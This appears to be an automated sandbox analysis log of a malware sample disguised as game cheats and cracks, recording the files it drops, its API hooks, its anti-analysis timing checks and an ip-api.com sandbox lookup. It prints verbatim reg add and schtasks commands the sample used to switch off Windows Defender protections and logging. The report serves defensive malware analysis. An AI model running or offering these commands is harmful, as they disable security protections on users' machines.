Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: wKj1CBkbos.exe Static file information: File size 13565952 > 1048576
Source: wKj1CBkbos.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcede00
Source: 52cheatand52rat.exe.0.dr Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
Source: Lunch LaCheatV2.exe.3.dr Static PE information: section name: .vmp0
Source: Lunch LaCheatV2.exe.3.dr Static PE information: section name: .vmp1
Source: Lunch LaCheat.exe.6.dr Static PE information: section name: .vmp0
Source: Lunch LaCheat.exe.6.dr Static PE information: section name: .vmp1
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Code function: 2_2_00007FFD342B00BD pushad ; iretd 2_2_00007FFD342B00C1

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe
Source: C:\Users\user\Desktop\wKj1CBkbos.exe File created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe File created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1EF0005 value: E9 2B BA 45 75
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 7734BA30 value: E9 DA 45 BA 8A
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1F00008 value: E9 8B 8E 49 75
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 77398E90 value: E9 80 71 B6 8A
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 1F10005 value: E9 8B 4D A2 74
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 76934D90 value: E9 7A B2 5D 8B
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 38E0005 value: E9 EB EB 06 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 7694EBF0 value: E9 1A 14 F9 8C
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 38F0005 value: E9 8B 8A 03 72
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 75928A90 value: E9 7A 75 FC 8D
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3900005 value: E9 2B 02 05 72
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 75950230 value: E9 DA FD FA 8D
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3910005 value: E9 8B 2F A7 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 77382F90 value: E9 7A D0 58 8C
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 3920007 value: E9 EB DF A9 73
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Memory written: PID: 4788 base: 773BDFF0 value: E9 1E 20 56 8C
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Lunch LaCheatV2.exe, 00000006.00000002.2263995910.0000000000408000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Q|SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 10396D7 second address: 10396EF instructions: 0x00000000 rdtsc 0x00000002 bsf dx, bx 0x00000006 test esp, 7F476D6Bh 0x0000000c xor cl, FFFFFFA9h 0x0000000f not dh 0x00000011 xor bl, cl 0x00000013 btc eax, FFFFFFACh 0x00000017 push ebp 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F8F9CE7A99Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh 0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx 0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl 0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] 0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax 0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl 0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F8F9DA92C7Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E98A5F second address: E98A69 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: E1951C second address: E19522 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Special instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Special instruction interceptor: First address: EF62C9 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: 1BC027A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: 1BC1C300000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1408 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1816 Thread sleep count: 163 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 6600 Thread sleep count: 115 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 7072 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe TID: 1812 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
